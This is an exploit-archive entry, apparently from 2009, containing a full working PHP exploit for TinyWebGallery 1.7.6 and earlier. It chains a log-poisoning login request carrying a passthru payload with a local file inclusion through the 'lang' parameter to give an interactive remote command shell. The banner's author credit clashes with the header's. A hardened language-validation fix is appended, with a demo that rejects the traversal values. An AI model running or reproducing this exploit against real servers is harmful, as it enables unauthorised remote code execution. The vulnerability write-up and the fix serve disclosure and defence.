TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit
Source: travesti[at]travesti.in  Author: travesti  Published: 2009-05-12
<?php

/*
        -----------------------------------------------------------
        TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit
        -----------------------------------------------------------

        author...: travesti
        mail.....: travesti[at]travesti.in

        link.....: http://www.travesti.in
        details..: this vulnerability derives from QuiXplorer (http://quixplorer.sourceforge.net/)
        exp link.: http://www.travesti.in/ex.txt

        This PoC was written for educational purpose. Use it at your own risk.
        Author will be not responsible for any damage.

        [-] vulnerable code in /admin/_include/init.php

        110.    // Get Language
        111.    if (isset($GLOBALS['__GET']["lang"]))  $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] = $GLOBALS['__GET']["lang"];
        112.    elseif (isset($GLOBALS['__POST']["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] = $GLOBALS['__POST']["lang"];
        113.    else if (isset($_SESSION["admin_lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"];
        114.    else $GLOBALS["language"] = $GLOBALS["default_language"];
        115.    [...]
        138.
        139.    // ------------------------------------------------------------------------------
        140.    // Necessary files
        141.    require _QUIXPLORER_PATH . "/_config/conf.php";
        142.
        143.    if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php"))
        144.        require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php";
        145.    else if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php"))
        146.        require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php";
        147.    else
        148.        require _QUIXPLORER_PATH . "/_lang/en.php";

        An attacker could include arbitrary local files through the require
        call at line 144, because the $_GET['lang'] parameter isn't properly
        sanitised. Successful exploitation requires magic_quotes_gpc = off.

        [-] Disclosure timeline:
        [14/04/2009] - Bug discovered
        [25/04/2009] - Vendor contacted
        [26/04/2009] - Vendor replied
        [26/04/2009] - Fix released: http://www.tinywebgallery.com/forum/viewtopic.php?t=1653
        [08/05/2009] - Public disclosure
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

// Send a raw HTTP request to $host:80 and return the complete response.
function http_send($host, $packet)
{
    if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
        die("\nsocket_create(): " . socket_strerror($s) . "\n");

    if (socket_connect($s, $host, 80) == false)
        die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");

    socket_write($s, $packet, strlen($packet));

    $response = "";
    while ($m = socket_read($s, 2048)) $response .= $m;
    socket_close($s);

    return $response;
}

// Read magic_quotes_gpc from the application's own phpinfo() page.
function check_target()
{
    global $host, $path;

    $packet  = "GET {$path}info.php?showphpinfo=true HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";

    preg_match('/magic_quotes_gpc<\/td><td class="v">(.*)<\/td><td/', http_send($host, $packet), $match);

    if ($match[1] != "Off") die("\n[-] Exploit failed...magic_quotes_gpc = on\n");
}

// Write the PHP stub into the log file through a failed admin login.
function inject_code()
{
    global $host, $path;

    $code    = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>";
    $payload = "p_user={$code}&p_pass=";

    $packet  = "POST {$path}admin/index.php?action=login HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;

    http_send($host, $packet);
}

print "\n+---------------------------------------------------------------------+";
print "\n| TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] host path\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /twg/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

check_target();
inject_code();

// "%%00" is a sprintf-escaped "%00"; "%s" is filled with the encoded command below.
$packet  = "GET {$path}admin/index.php?lang=../../counter/_twg.log%%00 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while (1)
{
    print "\ntwg-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}

?>
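The root cause is that the raw `lang` value reaches `require` (and is stored in the session unvalidated). The following is an added example, not code from the advisory, from TinyWebGallery or from QuiXplorer: a hardened replacement for the language-selection block in `admin/_include/init.php`. The helpers `select_language()` and `resolve_admin_language()` are this example's own inventions, and the `_lang` directory it writes under the system temp dir is constructed sample data so the script runs offline.

```php
<?php
// Added example (not from the advisory, nor TinyWebGallery/QuiXplorer code):
// a hardened version of the language selection from admin/_include/init.php.
// select_language() and resolve_admin_language() are helpers of this example's own devising.

/**
 * Return a language code that is safe to pass to require(), or $default.
 *
 * Two independent checks: the value must look like a language code, so
 * "../", null bytes and wrapper prefixes fail before any filesystem call,
 * and the resolved file must exist directly inside $lang_dir.
 */
function select_language($requested, $lang_dir, $default = 'en')
{
    // \z rather than $ so a trailing newline cannot slip past the pattern.
    if (!is_string($requested) || !preg_match('/^[a-z]{2,8}(_[A-Z]{2})?\z/', $requested)) {
        return $default;
    }
    $dir = realpath($lang_dir);
    if ($dir === false) {
        return $default;
    }
    $file = realpath($dir . DIRECTORY_SEPARATOR . $requested . '.php');
    // Missing file, or (defensively) resolved outside the language directory.
    if ($file === false || dirname($file) !== $dir) {
        return $default;
    }
    return $requested;
}

// How init.php would use it: validate once, store only the validated value in the session.
function resolve_admin_language($get, $post, &$session, $lang_dir, $default = 'en')
{
    if (isset($get['lang'])) {
        $candidate = $get['lang'];
    } elseif (isset($post['lang'])) {
        $candidate = $post['lang'];
    } elseif (isset($session['admin_lang'])) {
        $candidate = $session['admin_lang'];
    } else {
        $candidate = $default;
    }
    $language = select_language($candidate, $lang_dir, $default);
    $session['admin_lang'] = $language;
    return $language;
}

// --- Demo: constructed _lang directory with two language files in the temp dir ---
$langDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'twg_lang_demo';
if (!is_dir($langDir)) {
    mkdir($langDir);
}
file_put_contents($langDir . '/en.php', "<?php \$GLOBALS['messages'] = array('hello' => 'Hello');\n");
file_put_contents($langDir . '/de.php', "<?php \$GLOBALS['messages'] = array('hello' => 'Hallo');\n");

$samples = array(
    'de',                          // valid and present
    'fr',                          // well-formed but no file: falls back to default
    '../../counter/_twg.log',      // the traversal value used by the exploit above
    "../../counter/_twg.log\0",    // same value with the null byte appended
);
$session = array();
foreach ($samples as $s) {
    $lang = resolve_admin_language(array('lang' => $s), array(), $session, $langDir);
    require $langDir . '/' . $lang . '.php';
    printf("%-32s => %s (%s)\n", str_replace("\0", '\0', $s), $lang, $GLOBALS['messages']['hello']);
}
```

Run it with `php hardened_lang.php`: `de` is accepted, while `fr` (no file) and both traversal values fall back to `en`. Because the value is rejected by the pattern before it reaches `realpath()` or `require`, the `magic_quotes_gpc` setting and the null-byte truncation the exploit relies on no longer matter; and since only the validated code is written to `$_SESSION['admin_lang']`, a poisoned session cannot re-introduce the path on a later request.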

 